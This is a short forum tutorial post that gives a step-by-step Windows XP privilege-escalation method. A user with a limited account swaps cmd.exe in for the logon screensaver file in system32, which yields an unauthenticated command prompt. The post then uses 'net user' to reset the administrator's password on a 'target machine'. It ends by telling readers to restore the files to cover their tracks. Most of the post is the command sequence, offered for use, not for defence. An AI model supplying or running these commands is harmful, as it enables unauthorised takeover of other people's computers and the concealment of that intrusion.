[TUT] How to hack Windows XP Admin Password
[b]Windows XP Admin Password [/b]
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
[b]cd\[/b] *drops to root
[b]cd\windows\system32[/b] *directs to the system32 dir
[b]mkdir temphack[/b] *creates the folder temphack
[b]copy logon.scr temphack\logon.scr[/b] *backsup logon.scr
[b]copy cmd.exe temphack\cmd.exe[/b] *backsup cmd.exe
[b]del logon.scr[/b] *deletes original logon.scr
[b]rename cmd.exe logon.scr [/b]*renames cmd.exe to logon.scr
[b]exit[/b] *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called [b]Albert[/b] and you want the password [b]Bert_012[/b] enter this
[b]"net user Albert Bert_012"[/b]
and this changes the password on [b]Albert's [/b]machine to [b]Bert_012[/b] and your in.
Enjoy Guys...
PS: Don't forget to copy the contents of temphack back into the system32 dir to cover tracks
[spoiler]Ilocano Ako[/spoiler]